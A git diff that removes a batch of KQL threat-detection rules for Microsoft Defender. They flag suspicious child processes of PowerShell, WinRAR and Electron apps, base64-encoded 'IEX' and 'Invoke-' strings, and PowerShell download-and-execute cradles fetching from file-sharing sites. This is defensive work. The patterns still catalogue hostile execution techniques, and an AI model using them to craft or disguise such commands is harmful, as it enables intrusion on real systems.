-| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\"))
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql b/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql
deleted file mode 100644
index 0c3792ca..00000000
--- a/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/31
-// Level: medium
-// Description: Detects potentially suspicious child processes of WinRAR.exe.
-// Tags: attack.execution, attack.t1203
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
deleted file mode 100644
index a30d1353..00000000
--- a/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024/05/13
-// Level: medium
-// Description: Detects potentially suspicious child processes of KeyScrambler.exe
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql b/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql
deleted file mode 100644
index 9450e461..00000000
--- a/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/05
-// Level: medium
-// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe")))
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql b/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql
deleted file mode 100644
index b775a211..00000000
--- a/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/22
-// Level: medium
-// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
-// Tags: attack.execution
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-"
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql b/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql
deleted file mode 100644
index d5ba34b0..00000000
--- a/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/23
-// Level: high
-// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io")
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql b/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql
deleted file mode 100644
index 9a025e0f..00000000
--- a/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Tim Shelton
-// Date: 2022/04/26
-// Level: high
-// Description: Detects potentially suspicious child processes spawned by PowerShell
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\")))
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql b/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql
deleted file mode 100644
index f6568258..00000000
--- a/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Micah Babinski
-// Date: 2023/08/21
-// Level: medium
-// Description: Detects possible execution via LNK file accessed on a WebDAV server.
-// Tags: attack.execution, attack.t1059.001, attack.t1204
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql b/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql
deleted file mode 100644
index e2931fc4..00000000
--- a/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/08/24
-// Level: high
-// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
-// Tags: attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw")
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql b/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql
deleted file mode 100644
index 3f4eb318..00000000
--- a/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/08/23
-// Level: high
-// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA")
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql b/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql
deleted file mode 100644
index be3160c2..00000000
--- a/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
-// Date: 2022/05/20
-// Level: high
-// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql b/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql
deleted file mode 100644
index 7b67f975..00000000
--- a/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects base64 encoded .NET reflective loading of Assembly
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027, attack.t1620
-DeviceProcessEvents
-| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA"
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql b/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql
deleted file mode 100644
index 78c3b4de..00000000
--- a/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/30
-// Level: high
-// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud"))
\ No newline at end of file
diff --git a/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql b/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql
deleted file mode 100644
index 1036a4ff..00000000
--- a/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019/11/14
-// Level: medium
-// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
-Detects behavior similar to meterpreter's "load powershell" extension.
-
-// Tags: attack.t1059.001, attack.execution
-DeviceImageLoadEvents
-| where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe") or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\runscripthelper.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\ServerManager.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\SyncAppvPublishingServer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\winrshost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\winrshost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\wsmprovhost.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath contains ":\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\asgard2-agent\\" and (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft SQL Server Management Studio") and InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe") or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft SQL Server\\") and InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/Execution/PowerShell_DownloadFile.kql b/Execution/PowerShell_DownloadFile.kql
deleted file mode 100644
index da7ff4be..00000000
--- a/Execution/PowerShell_DownloadFile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/08/28
-// Level: high
-// Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
-// Tags: attack.execution, attack.t1059.001, attack.command_and_control, attack.t1104, attack.t1105
-DeviceProcessEvents
-| where ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".DownloadFile" and ProcessCommandLine contains "System.Net.WebClient"
\ No newline at end of file
diff --git a/Execution/PowerShell_Download_Pattern.kql b/Execution/PowerShell_Download_Pattern.kql
deleted file mode 100644
index cdfb87e6..00000000
--- a/Execution/PowerShell_Download_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects a Powershell process that contains download commands in its command line string
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/PowerShell_Download_and_Execution_Cradles.kql b/Execution/PowerShell_Download_and_Execution_Cradles.kql
deleted file mode 100644
index 9e3c6d09..00000000
--- a/Execution/PowerShell_Download_and_Execution_Cradles.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/24
-// Level: high
-// Description: Detects PowerShell download and execution cradles.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression")
\ No newline at end of file
diff --git a/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql b/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql
deleted file mode 100644
index 5a6718b4..00000000
--- a/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/30
-// Level: high
-// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
